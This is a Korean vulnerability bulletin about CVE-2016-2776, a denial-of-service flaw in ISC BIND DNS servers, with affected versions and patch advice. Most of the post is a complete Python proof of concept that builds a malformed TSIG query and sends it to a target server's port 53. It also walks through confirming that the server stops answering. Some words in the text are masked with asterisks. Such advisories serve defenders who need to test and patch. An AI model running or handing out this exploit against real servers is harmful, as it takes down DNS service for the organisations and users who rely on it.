빈틈 방송_Bind-DOS 취약점.패킷 하나로 서버의 DNS 빈틈을 없앨 수 있습니까?

3348 단어 Bind빈틈 방송
간단한 소개:
ISC BIND는 광범위하게 응용되는 도메인 이름 서버 소프트웨어입니다.일주일 전 인터넷협회(ISC)가 빈틈 CVE-2016-2776과 관련 패치를 발표했는데 이것은 BIND 서버에 영향을 주는 심각한 서비스 거부 빈틈이다.
취약점 개요:
버퍼 때문에.c 응답을 올바르게 구성하지 않아 원격 ***자가 구성된 조회를 통해 서비스 거부(단언 실패 및 프로그램 종료)를 초래할 수 있습니다.우리는 10월 4일에 이미 ***자가 *** 도구를 인터넷에 공개한 것을 발견했다.
버전 영향:
BIND 9.0.x -> 9.8.x
BIND 9.9.0->9.9.9-P2
BIND 9.9.3-S1->9.9.9-S3
BIND 9.10.0->9.10.4-P2
BIND 9.11.0a1->9.11.0rc1
테스트 코드:
import socket
import struct

TARGET = ('192.168.200.10', 53)

Q_A = 1
Q_TSIG = 250
DNS_MESSAGE_HEADERLEN = 12


def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
    query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"

    sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
    tsig_rr = build_tsig_rr(sweet_spot)

    return query_A + tsig_rr

def int16(n):
    return struct.pack("!H", n)

def build_tsig_rr(bind_demarshalled_size):
    signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
                      "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
    tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"

    necessary_bytes  = len(signature_data) + len(tsig_rr_extra_fields)
    necessary_bytes += 2 + 2 # length fields

    # from sizeof(TSIG RR) bytes conforming the TSIG RR
    # bind9 uses sizeof(TSIG RR) - 16 to build its own
    sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)

    tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
    tsig_data = algo_name + signature_data
    return tsig_hdr + int16(len(tsig_data)) + tsig_data

def generate_padding(n):
    max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
    buckets = [1] * len(max_per_bucket)

    min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte
    max_size = sum(max_per_bucket) + len(buckets) + 2

    if not(min_size <= n <= max_size):
        raise RuntimeException("unsupported amount of bytes")

    curr_idx, n = 0, n - min_size
    while n > 0:
        next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
        buckets[curr_idx] = 1 + n - next_n
        n, curr_idx = next_n, curr_idx + 1

    n_padding = lambda amount: chr(amount) + "A" * amount
    stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"

    return stringify(buckets[:4]), stringify(buckets[4:])

if __name__ == "__main__":
    bombita = build_bind_nuke()

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bombita, TARGET)
    s.close()

취약점 테스트:
하나.정상 조회 요청 dig@dns_server_ip yourdomain.com-t ns+short 정상 응답은 다음과 같습니다.yourdomain.com.ns1.yourdomain.com.2.*** 코드 python CVE-2016-2776 보내기.py dns_server_ip3.*** 효과 보내기 dig @dns_server_ip yourdomain.com -t ns +short는 다음과 같이 응답할 수 없습니다. <>>DiG 9.9.3 <<>> @dns_server_ip yourdomain.com -t ns +short; (1 server found);; global options: +cmd;; connection timed out; no servers could be reached
복구 시나리오:
주요 Linux 버전(예를 들어 빨간 모자, Centos, Ubuntu 등)은 현재 패치가 제공되어 있으며, 당신은 yumupdate(Redhat/Centos) 명령이나 apt-get update(Debian 클래스) 명령을 사용하여 패치를 하고 서버를 다시 시작하면 업데이트를 완성할 수 있습니다.

좋은 웹페이지 즐겨찾기